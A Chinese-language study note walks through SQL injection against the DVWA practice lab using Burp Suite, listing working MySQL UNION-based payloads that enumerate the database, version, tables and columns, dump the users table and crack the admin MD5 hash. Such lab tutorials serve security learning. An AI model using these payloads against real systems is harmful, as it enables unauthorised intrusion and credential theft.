網絡安全學習筆記,僅限學習交流
不得利用、從事危害國家或人民安全、榮譽和利益等活動
測試環境與工具:
測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機,裏面已經部署好了dvwa.。
滲透工具:burpsuite-1.4.07下載地址:http://down.51cto.com/data/875103
首先我們介紹下DVWA和Burpsuite,DVWA這是一個php+mysql平臺構建的預置web常見漏洞的滲透練習平臺。能夠幫助web應用安全研究人員很好了解web漏洞。Burpsuite是一款功能強大的web滲透測試工具。
SQL注入漏洞在OWASP TOP 10威脅中,一直排名第一,安全威脅可見一斑。SQL注入滲透測試過程中,針對不同的數據庫平臺,注入語句選擇也不同,本篇筆者主要測試mysql注入的常用語句以及滲透思路。
登錄訪問DVWA,默認用戶名:admin密碼:password.
1.選擇難度級別 Low
2. 輸入1.正常顯示。 1’ 報錯,根據報錯內容判斷爲’閉合
Order by 判斷 表的列數
3.union 聯合查詢語句 爆出數據庫
1’ union select 1,database() #
數據庫名爲:dvwa
union 聯合查詢,連接2個語句,
但先執行第1個,
如果顯示位只有1處,那麼第2個語句結果無法顯示
所以,輸入id=-1 語句正確,但無法顯示
那麼,顯示位即顯示第2個語句結果
數據庫版本號:
5.0以上版本,有information_schema.tables。包含所有的數據庫信息
1’ union select 1,version() #
測試連接數據庫權限:
1’ and ord(mid(user(),1,1))=114 #
返回正常說明爲root
- 爆出數據庫中的表名
1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
5.爆出users字段名
1’ union select 1,column_name from information_schema.columns where
table_name=‘users’
6.爆出用戶名和密碼,對應user和password
1’ union select user,password from users #
密碼進行了加密處理,需md5解密
用戶名:admin
密碼:5f4dcc3b5aa765d61d8327deb882cf99
解密爲:password